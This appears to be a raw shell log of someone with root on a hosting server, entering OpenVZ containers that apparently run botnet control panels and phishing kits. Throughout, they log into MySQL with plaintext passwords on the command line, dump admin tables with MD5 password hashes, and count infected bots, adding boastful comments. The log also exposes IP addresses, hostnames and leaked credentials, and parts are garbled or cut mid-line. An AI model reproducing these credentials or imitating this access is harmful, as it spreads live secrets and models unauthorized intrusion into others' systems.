-tulpn Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 9044/tcpserver tcp 0 0 0.0.0.0:7778 0.0.0.0:* LISTEN 338/kloxo.httpd tcp 0 0 127.0.0.1:7776 0.0.0.0:* LISTEN 22868/php tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN 9051/tcpserver tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN 8760/tcpserver tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN 6813/tcpserver tcp 0 0 0.0.0.0:7779 0.0.0.0:* LISTEN 744/php tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN 31415/sendmail: MTA tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 28959/xinetd tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 27340/named tcp 0 0 193.107.16.217:53 0.0.0.0:* LISTEN 21090/named tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 21090/named tcp 0 0 0.0.0.0:7777 0.0.0.0:* LISTEN 20789/kloxo.httpd tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 12611/xinetd tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 21054/sshd tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 18864/mysqld tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 2855/apache2 tcp 0 0 193.107.17.80:53 0.0.0.0:* LISTEN 14937/named tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 2255/mysqld tcp 0 0 193.107.17.81:53 0.0.0.0:* LISTEN 29195/named tcp 0 0 193.107.16.197:443 0.0.0.0:* LISTEN 19137/lighttpd tcp 0 0 0.0.0.0:55986 0.0.0.0:* LISTEN 350/perl tcp 0 0 0.0.0.0:65500 0.0.0.0:* LISTEN 22852/perl tcp 0 0 0.0.0.0:5544 0.0.0.0:* LISTEN 6594/sshd tcp 0 0 193.107.17.69:53 0.0.0.0:* LISTEN 24903/named tcp 0 0 193.107.16.184:53 0.0.0.0:* LISTEN 16961/named tcp 0 0 193.107.16.183:53 0.0.0.0:* LISTEN 24588/named tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 25293/sendmail: MTA tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 6276/portmap tcp 0 0 193.107.16.196:53 0.0.0.0:* LISTEN 30862/named tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 15210/smbd tcp 0 0 193.107.17.67:53 0.0.0.0:* LISTEN 25565/named tcp 0 0 193.107.16.81:53 0.0.0.0:* LISTEN 12513/named tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN 21079/php-fpm.conf) tcp 0 0 127.0.0.1:8886 0.0.0.0:* LISTEN 8978/php tcp 0 0 193.107.16.55:53 0.0.0.0:* LISTEN 8944/named tcp 0 0 0.0.0.0:8887 0.0.0.0:* LISTEN 7026/hypervm.httpd tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 6608/cupsd tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN 7026/hypervm.httpd tcp 0 0 193.107.17.83:53 0.0.0.0:* LISTEN 18447/named tcp 0 0 0.0.0.0:8889 0.0.0.0:* LISTEN 8978/php tcp 0 0 0.0.0.0:985 0.0.0.0:* LISTEN 6315/rpc.statd tcp 0 0 193.107.17.68:53 0.0.0.0:* LISTEN 27340/named tcp 0 0 193.107.16.55:443 0.0.0.0:* LISTEN 16889/lighttpd tcp 0 0 127.0.0.1:2000 0.0.0.0:* LISTEN 25205/varnishd tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 20954/nginx tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 15210/smbd tcp 0 0 :::80 :::* LISTEN 28969/httpd tcp 0 0 :::21 :::* LISTEN 31096/proftpd: (acc tcp 0 0 ::1:953 :::* LISTEN 27340/named tcp 0 0 :::22 :::* LISTEN 21198/sshd tcp 0 0 :::443 :::* LISTEN 2460/httpd tcp 0 0 :::5544 :::* LISTEN 6594/sshd tcp 0 0 :::53 :::* LISTEN 16961/named udp 0 0 0.0.0.0:111 0.0.0.0:* 6276/portmap udp 0 0 193.107.16.55:53 0.0.0.0:* 8944/named udp 0 0 127.0.0.1:53 0.0.0.0:* 8944/named udp 0 0 193.107.16.197:53 0.0.0.0:* 15203/tinydns udp 0 0 193.107.16.81:53 0.0.0.0:* 12513/named udp 0 0 127.0.0.1:53 0.0.0.0:* 12513/named udp 0 0 193.107.16.184:53 0.0.0.0:* 16961/named udp 0 0 127.0.0.1:53 0.0.0.0:* 16961/named udp 0 0 193.107.17.80:53 0.0.0.0:* 14937/named udp 0 0 127.0.0.1:53 0.0.0.0:* 14937/named udp 0 0 193.107.17.83:53 0.0.0.0:* 18447/named udp 0 0 127.0.0.1:53 0.0.0.0:* 18447/named udp 0 0 193.107.16.184:137 0.0.0.0:* 14895/nmbd udp 0 0 193.107.16.184:137 0.0.0.0:* 14895/nmbd udp 0 0 0.0.0.0:137 0.0.0.0:* 14895/nmbd udp 0 0 193.107.16.184:138 0.0.0.0:* 14895/nmbd udp 0 0 193.107.16.184:138 0.0.0.0:* 14895/nmbd udp 0 0 0.0.0.0:138 0.0.0.0:* 14895/nmbd udp 0 0 193.107.16.217:53 0.0.0.0:* 21090/named udp 0 0 127.0.0.1:53 0.0.0.0:* 21090/named udp 0 0 193.107.16.183:53 0.0.0.0:* 24588/named udp 0 0 127.0.0.1:53 0.0.0.0:* 24588/named udp 0 0 193.107.17.69:53 0.0.0.0:* 24903/named udp 0 0 127.0.0.1:53 0.0.0.0:* 24903/named udp 0 0 193.107.17.67:53 0.0.0.0:* 25565/named udp 0 0 127.0.0.1:53 0.0.0.0:* 25565/named udp 0 0 193.107.17.68:53 0.0.0.0:* 27340/named udp 0 0 127.0.0.1:53 0.0.0.0:* 27340/named udp 0 0 193.107.17.81:53 0.0.0.0:* 29195/named udp 0 0 127.0.0.1:53 0.0.0.0:* 29195/named udp 0 0 193.107.16.196:53 0.0.0.0:* 30862/named udp 0 0 127.0.0.1:53 0.0.0.0:* 30862/named udp 0 0 0.0.0.0:631 0.0.0.0:* 6608/cupsd udp 0 0 0.0.0.0:979 0.0.0.0:* 6315/rpc.statd udp 0 0 0.0.0.0:982 0.0.0.0:* 6315/rpc.statd udp 0 0 0.0.0.0:10000 0.0.0.0:* 22852/perl udp 0 0 0.0.0.0:10000 0.0.0.0:* 350/perl udp 0 0 0.0.0.0:53957 0.0.0.0:* 29116/avahi-daemon: udp 0 0 0.0.0.0:5353 0.0.0.0:* 29116/avahi-daemon: udp 0 0 :::53 :::* 16961/named udp 0 0 :::53 :::* 24588/named udp 0 0 :::5353 :::* 29116/avahi-daemon: udp 0 0 :::56885 :::* 29116/avahi-daemon: # cd /home/ # ls total 104 drwxr-xr-x 21 root root 4096 Oct 3 08:21 . drwxr-xr-x 25 root root 4096 Oct 10 05:48 .. drwx------ 2 bdgatevm bdgatevm 4096 Aug 22 05:35 bdgatevm drwx------ 2 bnetvm bnetvm 4096 May 21 02:36 bnetvm drwx------ 2 fredvm fredvm 4096 Sep 5 08:40 fredvm drwxr-xr-x 2 root root 4096 May 12 01:07 httpd drwxr-xr-x 7 root root 4096 Aug 22 06:08 hypervm drwx------ 2 iodasvm iodasvm 4096 Jun 13 03:25 iodasvm drwx------ 2 ixdevm ixdevm 4096 Sep 9 09:19 ixdevm drwx------ 2 lxlabs lxlabs 4096 May 12 01:04 lxlabs drwx------ 2 rootvm rootvm 4096 Aug 15 04:15 rootvm drwx------ 2 scriptstvm scriptstvm 4096 May 22 02:41 scriptstvm drwx------ 2 sethvm sethvm 4096 Oct 3 08:21 sethvm drwx------ 2 spike80vm spike80vm 4096 Sep 7 01:32 spike80vm drwx------ 2 spikevm spikevm 4096 Jun 7 09:21 spikevm drwx------ 2 stansecuvm stansecuvm 4096 May 18 03:40 stansecuvm drwx------ 2 stansocksvm stansocksvm 4096 Aug 15 04:26 stansocksvm drwx------ 2 truevm truevm 4096 May 16 06:29 truevm drwx------ 2 wohovm wohovm 4096 Sep 16 03:03 wohovm drwx------ 2 xtothecvm xtothecvm 4096 Jun 9 08:40 xtothecvm drwx------ 2 y00vm y00vm 4096 Jun 13 03:02 y00vm # du -h 20K ./ixdevm 20K ./scriptstvm 20K ./fredvm 20K ./rootvm 20K ./spikevm 20K ./stansecuvm 20K ./xtothecvm 20K ./iodasvm 20K ./bdgatevm 20K ./y00vm 20K ./stansocksvm 20K ./spike80vm 32K ./lxlabs 20K ./wohovm 8.0K ./httpd 20K ./sethvm 32K ./hypervm/xen/template 40K ./hypervm/xen 1.7M ./hypervm/selfbackup/self/__backup 1.7M ./hypervm/selfbackup/self 1.7M ./hypervm/selfbackup 4.0K ./hypervm/vps/fred.vm/__backup 8.0K ./hypervm/vps/fred.vm 12K ./hypervm/vps 16K ./hypervm/lxguard 8.0K ./hypervm/client/admin 16K ./hypervm/client 1.8M ./hypervm 20K ./bnetvm 20K ./truevm 2.2M . # mysql -u snap_db snap_db -pwBqGlNtjZ2m -h bgate.secure-host.in Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 717502 Server version: 5.0.92 Source distribution Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> SELECT COUNT(*) FROM list_bots; +----------+ | COUNT(*) | +----------+ | 29818 | +----------+ 1 row in set (0.00 sec) mysql> select * from list_users; +----+-------+----------------------------------+-------------+-------+-----+ | id | nick | passwd | permissions | theme | lng | +----+-------+----------------------------------+-------------+-------+-----+ | 1 | admin | 76a2173be6393254e72ffa4d6df1030a | 255 | dark | en | | 2 | test | 598d4c200461b81522a3328565c25f7c | 255 | dark | en | +----+-------+----------------------------------+-------------+-------+-----+ 2 rows in set (0.00 sec) mysql> Ctrl-C -- exit! Aborted # 29818 bots here, not bad...^C # # We better check out the other VMs # vzlist Warning: Unknown iptable module: ipt_connlimit, skipped CTID NPROC STATUS IP_ADDR HOSTNAME 130 64 running 193.107.16.55 true 140 60 running 193.107.16.197 stansecu 160 62 running 193.107.16.81 testing 180 18 running 193.107.16.184 scriptst 240 59 running 193.107.17.80 spike 250 34 running 193.107.17.82 vps287.cyberhost.kz 260 59 running 193.107.17.83 y00 270 38 running 193.107.17.66 iodas 300 34 running 193.107.16.217 Ro0t.cyberhost.kz 310 23 running 193.107.16.183 stansocks 340 56 running 193.107.17.69 badgate.cyberhost.kz 350 59 running 193.107.17.67 fr3d.cyberhost.kz 360 61 running 193.107.17.68 vps241.cyberhost.kz 370 61 running 193.107.17.81 vps249.cyberhost.kz 380 64 running 193.107.16.196 vps254.cyberhost.kz 390 10 running 193.107.16.185 vps522.cyberhost.kz # vzctl enter 130 Warning: Unknown iptable module: ipt_connlimit, skipped entered into CT 130 [root@true /]# last reboot system boot 2.6.18-238.9.1.e Mon Oct 10 13:48 (03:55) reboot system boot 2.6.18-238.9.1.e Tue Oct 4 10:42 (6+01:17) root pts/0 77-20-18-64-dyni Tue Oct 4 10:04 - down (00:37) reboot system boot 2.6.18-238.9.1.e Tue Oct 4 09:54 (00:47) root pts/0 p5483a590.dip.t- Sat Oct 1 12:50 - 12:55 (00:05) root pts/0 p5483a590.dip.t- Sat Oct 1 07:48 - 08:31 (00:43) reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:19 (5+23:56) reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:11 (00:08) reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:10 (00:00) reboot system boot 2.6.18-238.9.1.e Tue Sep 27 09:50 (04:19) reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:23 (18:26) reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:20 (00:01) reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:19 (00:01) reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:16 (00:01) reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:05 (00:10) reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:54 (00:10) reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:52 (00:01) reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:49 (00:02) root pts/0 p5483d6ba.dip.t- Fri Sep 23 16:32 - 17:03 (00:31) root pts/0 p5483d6ba.dip.t- Fri Sep 23 16:21 - 16:32 (00:10) reboot system boot 2.6.18-238.9.1.e Thu Sep 1 11:18 (25+03:30) root pts/0 p5483df28.dip.t- Thu Sep 1 10:49 - down (00:29) reboot system boot 2.6.18-238.9.1.e Thu Sep 1 09:58 (01:19) reboot system boot 2.6.18-238.9.1.e Thu Sep 1 09:58 (00:00) [root@true /]# cd /home/ [root@true home]# ls -la total 60 drwxr-xr-x 15 root root 4096 Oct 1 12:50 . drwxr-xr-x 23 root root 4096 Oct 10 13:48 .. drwx------ 3 admin admin 4096 Sep 1 11:01 admin drwx------ 2 axfrdns axfrdns 4096 Sep 1 11:10 axfrdns drwx------ 2 dnscache dnscache 4096 Sep 1 11:10 dnscache drwx------ 2 dnslog dnslog 4096 Sep 1 11:10 dnslog drwxr-xr-x 3 root root 4096 Sep 1 11:12 httpd drwxr-xr-x 3 root root 4096 Oct 1 07:55 irc drwxr-xr-x 6 root root 4096 Sep 2 04:15 kloxo drwxr-xr-x 3 root root 4096 Sep 1 11:00 lxadmin drwx------ 2 lxlabs lxlabs 4096 Sep 1 10:53 lxlabs drwxr-xr-x 3 root root 4096 Oct 1 12:52 mocks drwx------ 2 nouser nogroup 4096 Sep 1 10:53 nouser drwx------ 2 tinydns tinydns 4096 Sep 1 11:10 tinydns drwxr-x--- 5 true.cyberhost.kz apache 4096 Sep 2 04:04 true.cyberhost.kz [root@true true.cyberhost.kz]# cd true.cyberhost.kz/ [root@true true.cyberhost.kz]# ls -la total 36 drwxr-x--- 5 true.cyberhost.kz apache 4096 Sep 2 04:04 . drwxr-xr-x 15 root root 4096 Oct 1 12:50 .. -rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 33 Sep 1 11:12 .bash_logout -rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 176 Sep 1 11:12 .bash_profile -rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 124 Sep 1 11:12 .bashrc drwxr-xr-x 2 true.cyberhost.kz true.cyberhost.kz 4096 Sep 1 11:12 kloxoscript drwxr-xr-x 2 root root 4096 Oct 5 05:02 __processed_stats lrwxrwxrwx 1 root root 42 Sep 1 11:12 public_html -> /home/true.cyberhost.kz/true.cyberhost.kz/ -rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 11 Sep 1 11:12 .qmail drwxr-xr-x 5 true.cyberhost.kz apache 4096 Oct 4 10:31 true.cyberhost.kz [root@true true.cyberhost.kz]# cd true.cyberhost.kz/ [root@true true.cyberhost.kz]# ls Design portokalli wordpress [root@true true.cyberhost.kz]# cd wordpress/ [root@true wordpress]# ls index.php [root@true wordpress]# cat index.php

Visit CyberNetwork

KLICK HIER!!! [root@true wordpress]# # nothing to see here [root@true true.cyberhost.kz]# logout exited from CT 130 # vzctl enter 140 Warning: Unknown iptable module: ipt_connlimit, skipped entered into CT 140 [root@stansecu /]# last reboot system boot 2.6.18-238.9.1.e Mon Oct 10 13:48 (03:59) root pts/0 p57b104ec.dip0.t Mon Oct 10 06:09 - 10:15 (04:06) root pts/1 p57b10668.dip0.t Sun Oct 9 20:17 - 01:20 (05:02) root pts/0 193.107.17.30 Sun Oct 9 20:05 - 20:30 (00:24) root pts/0 193.107.17.30 Sun Oct 9 19:49 - 20:05 (00:16) root pts/0 193.107.17.30 Fri Sep 30 16:00 - 21:16 (05:16) stanwww pts/0 193.107.17.30 Fri Sep 30 15:59 - 15:59 (00:00) reboot system boot 2.6.18-238.9.1.e Thu Aug 11 15:15 (59+20:45) reboot system boot 2.6.18-238.9.1.e Wed Aug 10 09:44 (01:02) reboot system boot 2.6.18-238.9.1.e Wed Aug 10 09:32 (01:14) reboot system boot 2.6.18-238.9.1.e Wed Jul 13 17:11 (27+16:18) root pts/0 193.107.16.213 Sun Jul 10 19:59 - 23:31 (03:32) root pts/0 92.241.165.69 Fri Jul 1 11:24 - 18:41 (07:16) root pts/0 92.241.165.69 Thu Jun 30 15:40 - 19:48 (04:07) root pts/0 92.241.165.69 Tue Jun 28 18:52 - 18:52 (00:00) root pts/0 92.241.165.69 Wed Jun 22 06:29 - 07:36 (01:07) root pts/0 92.241.165.69 Mon Jun 20 07:41 - 08:24 (00:43) root pts/0 92.241.165.69 Tue Jun 14 16:03 - 16:43 (00:39) root pts/0 92.241.165.69 Mon Jun 13 11:27 - 18:21 (06:54) root pts/0 92.241.165.69 Sat Jun 11 05:45 - 22:19 (16:33) root pts/0 92.241.165.69 Mon May 30 12:58 - 13:01 (00:02) stanwww pts/0 92.241.165.69 Mon May 30 12:58 - 12:58 (00:00) root pts/0 92.241.165.69 Fri May 27 09:32 - 16:07 (06:34) root pts/0 92.241.165.69 Sun May 22 20:22 - 20:22 (00:00) root pts/0 92.241.165.69 Sat May 21 12:08 - 14:10 (02:02) root pts/0 92.241.165.69 Wed May 18 16:41 - 21:01 (04:20) reboot system boot 2.6.18-238.9.1.e Wed May 18 16:08 (55+14:20) root pts/1 92.241.165.69 Wed May 18 15:50 - down (00:17) root pts/0 77-20-18-64-dyni Wed May 18 12:23 - down (03:45) reboot system boot 2.6.18-238.9.1.e Wed May 18 11:45 (04:22) wtmp begins Wed May 18 11:45:54 2011 [root@stansecu /]# cd /home/ [root@stansecu home]# ls admin axfrdns dnscache dnslog httpd kloxo lxadmin lxlabs nouser stanwww tinydns [root@stansecu home]# cd stanwww/ [root@stansecu stanwww]# ls -la total 44 drwxr-x--- 7 stanwww apache 4096 Aug 7 17:22 . drwxr-xr-x 13 root root 4096 May 18 15:00 .. -rw-r--r-- 1 stanwww stanwww 33 May 18 15:00 .bash_logout -rw-r--r-- 1 stanwww stanwww 176 May 18 15:00 .bash_profile -rw-r--r-- 1 stanwww stanwww 124 May 18 15:00 .bashrc drwxr-xr-x 2 stanwww stanwww 4096 May 18 15:00 kloxoscript drwxr-xr-x 2 stanwww stanwww 4096 May 21 12:33 pass drwxr-xr-x 3 stanwww stanwww 4096 Aug 7 17:22 phishingtool drwxr-xr-x 2 root root 4096 Oct 10 03:57 __processed_stats lrwxrwxrwx 1 root root 37 May 18 15:00 public_html -> /home/stanwww/stanley.secure-host.in/ -rw-r--r-- 1 stanwww stanwww 11 May 18 15:00 .qmail drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 stanley.secure-host.in [root@stansecu stanwww]# cd stanley.secure-host.in [root@stansecu stanley.secure-host.in]# ls -la total 220 drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 . drwxr-x--- 7 stanwww apache 4096 Aug 7 17:22 .. drwxr-xr-x 2 stanwww stanwww 4096 Jul 10 11:14 bin drwxr-xr-x 2 stanwww stanwww 4096 May 18 15:00 cgi-bin drwxr-xr-x 2 stanwww stanwww 4096 Aug 11 2005 images -rwxr-xr-x 1 stanwww stanwww 1217 May 18 22:32 index.html drwxr-xr-x 2 stanwww stanwww 4096 Jul 9 18:25 java drwxr-xr-x 4 stanwww stanwww 4096 May 18 20:18 phishingtool drwxr-xr-x 6 stanwww stanwww 4096 Jun 6 18:56 snapbn -rw-r--r-- 1 stanwww stanwww 175104 Jun 13 11:16 sqlite3.dll drwxr-xr-x 7 stanwww stanwww 4096 Sep 30 16:24 umbralo drwxr-xr-x 9 stanwww stanwww 4096 May 21 12:32 unique [root@stansecu public_html]# cd phishingtool/ [root@stansecu phishingtool]# ls -la total 792 drwxr-xr-x 4 stanwww stanwww 4096 May 18 20:18 . drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 .. -rw-r--r-- 1 stanwww stanwww 601 Jul 10 11:45 config.php -rw-r--r-- 1 stanwww stanwww 2121 May 18 20:17 css.css -rw-r--r-- 1 stanwww stanwww 1973 May 18 20:17 export.php drwxr-xr-x 2 stanwww stanwww 4096 Jun 12 19:53 exports -rw-r--r-- 1 stanwww stanwww 750121 May 18 20:17 header.gif -rw-r--r-- 1 stanwww stanwww 490 May 18 20:17 im.php -rw-r--r-- 1 stanwww stanwww 1639 May 18 20:17 index.php -rw-r--r-- 1 stanwww stanwww 2230 May 18 20:17 login.php -rw-r--r-- 1 stanwww stanwww 111 May 18 20:17 logout.php -rw-r--r-- 1 stanwww stanwww 1590 May 18 20:17 logs.php drwxr-xr-x 6 stanwww stanwww 4096 Jul 10 11:48 phishing -rw-r--r-- 1 stanwww stanwww 889 May 18 20:18 private.php tansecu phishingtool]# cat config.php root@stansecu phishingtool]# cd .. [root@stansecu public_html]# cd snapbn/ [root@stansecu snapbn]# ls -la total 48 drwxr-xr-x 6 stanwww stanwww 4096 Jun 6 18:56 . drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 .. -rw-r--r-- 1 stanwww stanwww 4217 Jun 6 18:56 adv_state.php drwxr-xr-x 5 stanwww stanwww 4096 Jun 6 19:05 backend -rw-r--r-- 1 stanwww stanwww 2237 Jun 6 18:56 control.php drwxr-xr-x 2 stanwww stanwww 4096 Oct 9 16:26 frontend -rw-r--r-- 1 stanwww stanwww 3047 Jun 6 18:56 gate.php -rw-r--r-- 1 stanwww stanwww 931 Jun 6 18:56 grab_zone.php drwxr-xr-x 2 stanwww stanwww 4096 Jun 6 18:54 images -rw-r--r-- 1 stanwww stanwww 38 Jun 6 18:56 ip.php drwxr-xr-x 3 stanwww stanwww 4096 Jun 6 18:56 theme [root@stansecu snapbn]# cat backend/settings.inc.php [root@stansecu snapbn]# mysql -u stanwww_snap stanwww_snap -pfYXgyPRB8kv Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 4094 Server version: 5.0.92 Source distribution Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> SELECT COUNT(*) FROM list_bots; +----------+ | count(*) | +----------+ | 2553 | +----------+ 1 row in set (0.01 sec) mysql> SELECT * FROM list_users; +----+----------+----------------------------------+-------------+-------+-----+ | id | nick | passwd | permissions | theme | lng | +----+----------+----------------------------------+-------------+-------+-----+ | 1 | stan | 37a80cc8fffebfa607292c8814d89473 | 255 | dark | en | | 2 | youmetoo | 033f706d5832000e32c14ba6453ac415 | 255 | dark | en | +----+----------+----------------------------------+-------------+-------+-----+ 2 rows in set (0.00 sec) mysql> 2.5k bots ... well mysql> Ctrl-C -- exit! Aborted [root@stansecu snapbn]# logout exited from CT 140 # vzctl enter 160 Warning: Unknown iptable module: ipt_connlimit, skipped entered into CT 160 [root@testing /]# cd /home/ [root@testing home]# ls -la total 88 drwxr-xr-x 22 root root 4096 Sep 23 12:07 . drwxr-xr-x 23 root root 4096 Oct 10 13:49 .. drwx------ 3 admin admin 4096 May 21 11:17 admin drwx------ 2 axfrdns axfrdns 4096 May 21 11:28 axfrdns drwxr-x--- 5 deluxa apache 4096 Jun 15 03:57 deluxa drwx------ 2 dnscache dnscache 4096 May 21 11:28 dnscache drwx------ 2 dnslog dnslog 4096 May 21 11:28 dnslog drwxr-xr-x 12 root root 4096 Sep 23 12:07 httpd drwxr-xr-x 6 root root 4096 May 22 04:07 kloxo drwxr-x--- 5 lolboter apache 4096 Aug 10 03:57 lolboter drwxr-xr-x 3 root root 4096 May 21 11:17 lxadmin drwx------ 2 lxlabs lxlabs 4096 May 21 11:03 lxlabs drwxr-x--- 5 lyrex apache 4096 Sep 1 03:57 lyrex drwxr-x--- 5 master apache 4096 Sep 24 03:58 master drwx------ 2 nouser nogroup 4096 May 21 11:03 nouser drwxr-x--- 5 pep apache 4096 Jul 5 03:57 pep drwxr-x--- 6 pure apache 4096 Jul 5 22:32 pure drwxr-x--- 5 sprueche apache 4096 Jun 26 03:57 sprueche drwxr-x--- 5 symb apache 4096 Jun 15 03:57 symb drwxr-x--- 5 time apache 4096 May 22 03:57 time drwx------ 2 tinydns tinydns 4096 May 21 11:28 tinydns drwxr-x--- 5 winfuture apache 4096 May 23 03:57 winfuture root@testing home]# cd deluxa/ [root@testing deluxa]# ls -la total 36 drwxr-x--- 5 deluxa apache 4096 Jun 15 03:57 . drwxr-xr-x 22 root root 4096 Sep 23 12:07 .. -rw-r--r-- 1 deluxa deluxa 33 Jun 14 10:46 .bash_logout -rw-r--r-- 1 deluxa deluxa 176 Jun 14 10:46 .bash_profile -rw-r--r-- 1 deluxa deluxa 124 Jun 14 10:46 .bashrc drwxr-xr-x 5 deluxa apache 4096 Jun 14 10:50 deluxa.secure-host.in drwxr-xr-x 2 deluxa deluxa 4096 Jun 14 10:46 kloxoscript drwxr-xr-x 2 root root 4096 Jun 15 03:57 __processed_stats lrwxrwxrwx 1 root root 35 Jun 14 10:46 public_html -> /home/deluxa/deluxa.secure-host.in/ -rw-r--r-- 1 deluxa deluxa 11 Jun 14 10:46 .qmail [root@testing deluxa]# cd public_html/ [root@testing public_html]# ls cgi-bin images index.html snapbn [root@testing public_html]# cat snapbn/ adv_state.php backend/ control.php frontend/ gate.php grab_zone.php images/ ip.php theme/ [root@testing public_html]# cat snapbn/backend/ classes/ flags/ GeoIP.dat geoip.inc index.php js.js language/ settings.inc.php settings.inc.php_ system.php [root@testing public_html]# cat snapbn/backend/settings.inc.php [root@testing public_html]# mysql -u deluxa_snap deluxa_snap -p2ynPMKCST92 Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 602007 Server version: 5.0.92 Source distribution Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> SELECT * FROM list_users; +----+--------+----------------------------------+-------------+-------+-----+ | id | nick | passwd | permissions | theme | lng | +----+--------+----------------------------------+-------------+-------+-----+ | 1 | deluxa | 5f4dcc3b5aa765d61d8327deb882cf99 | 255 | dark | en | +----+--------+----------------------------------+-------------+-------+-----+ 1 row in set (0.00 sec) mysql> SELECT COUNT(*) FROM list_bots; +----------+ | COUNT(*) | +----------+ | 45 | +----------+ 1 row in set (0.00 sec) mysql> Ctrl-C -- exit! Aborted [root@testing lolboter]# cd /home/lolboter/public_html/ [root@testing public_html]# ls -la total 28 drwxrwxrwx 6 lolboter apache 4096 Oct 18 16:50 . drwxr-x--- 5 lolboter apache 4096 Aug 10 03:57 .. drwxrwxrwx 2 lolboter lolboter 4096 Aug 9 11:45 cgi-bin drwxrwxrwx 2 lolboter lolboter 4096 Aug 11 2005 images -rwxrwxrwx 1 lolboter lolboter 1213 Aug 9 11:45 index.html drwxr-xr-x 3 lolboter lolboter 4096 Aug 9 13:06 snapbn drwxrwxrwx 6 lolboter lolboter 4096 Aug 9 12:55 upload [root@testing public_html]# cat snapbn/backend/settings.inc.php SELECT * FROM list_users; +----+-------+----------------------------------+-------------+-------+-----+ | id | nick | passwd | permissions | theme | lng | +----+-------+----------------------------------+-------------+-------+-----+ | 1 | admin | e6053eb8d35e02ae40beeeacef203c1a | 255 | dark | en | +----+-------+----------------------------------+-------------+-------+-----+ 1 row in set (0.00 sec) mysql> SELECT COUNT(*) FROM list_bots; +----------+ | COUNT(*) | +----------+ | 349 | +----------+ 1 row in set (0.00 sec) mysql> Ctrl-C -- exit! Aborted [root@testing public_html]# mysql -u lyrex_snap lyrex_snap -pIxBEyUkcjRy mysql> SELECT * FROM list_users; +----+-------+----------------------------------+-------------+-------+-----+ | id | nick | passwd | permissions | theme | lng | +----+-------+----------------------------------+-------------+-------+-----+ | 1 | lyrex | d43a389b900aff13aa56477e7f3618df | 255 | dark | en | +----+-------+----------------------------------+-------------+-------+-----+ 1 row in set (0.00 sec) mysql> SELECT COUNT(*) FROM list_bots; +----------+ | COUNT(*) | +----------+ | 658 | +----------+ 1 row in set (0.01 sec) mysql> Ctrl-C -- exit! Aborted [root@testing home]# logout exited from CT 160 # vzctl enter 240 Warning: Unknown iptable module: ipt_connlimit, skipped entered into CT 240 [root@spike /]# cd /home [root@spike home]# ls -la total 52 drwxr-xr-x 13 root root 4096 Jun 7 18:11 . drwxr-xr-x 23 root root 4096 Oct 10 13:49 .. drwx------ 3 admin admin 4096 May 22 13:38 admin drwx------ 2 axfrdns axfrdns 4096 May 22 13:51 axfrdns drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 bnet drwx------ 2 dnscache dnscache 4096 May 22 13:51 dnscache drwx------ 2 dnslog dnslog 4096 May 22 13:51 dnslog drwxr-xr-x 3 root root 4096 Jun 7 18:11 httpd drwxr-xr-x 6 root root 4096 Jun 8 04:07 kloxo drwxr-xr-x 3 root root 4096 May 22 13:37 lxadmin drwx------ 2 lxlabs lxlabs 4096 May 22 13:23 lxlabs drwx------ 2 nouser nogroup 4096 May 22 13:23 nouser drwx------ 2 tinydns tinydns 4096 May 22 13:51 tinydns [root@spike home]# cd httpd [root@spike httpd]# ls -la total 16 drwxr-xr-x 3 root root 4096 Jun 7 18:11 . drwxr-xr-x 13 root root 4096 Jun 7 18:11 .. -rwxr-xr-x 1 root root 111 May 22 13:51 nobody.sh drwxrwxr-x 6 bnet apache 4096 Jun 7 18:11 spike.secure-host.in [root@spike httpd]# cd .. [root@spike home]# cd bnet [root@spike bnet]# ls -la total 36 drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 . drwxr-xr-x 13 root root 4096 Jun 7 18:11 .. -rw-r--r-- 1 bnet bnet 33 Jun 7 18:11 .bash_logout -rw-r--r-- 1 bnet bnet 176 Jun 7 18:11 .bash_profile -rw-r--r-- 1 bnet bnet 124 Jun 7 18:11 .bashrc drwxr-xr-x 2 bnet bnet 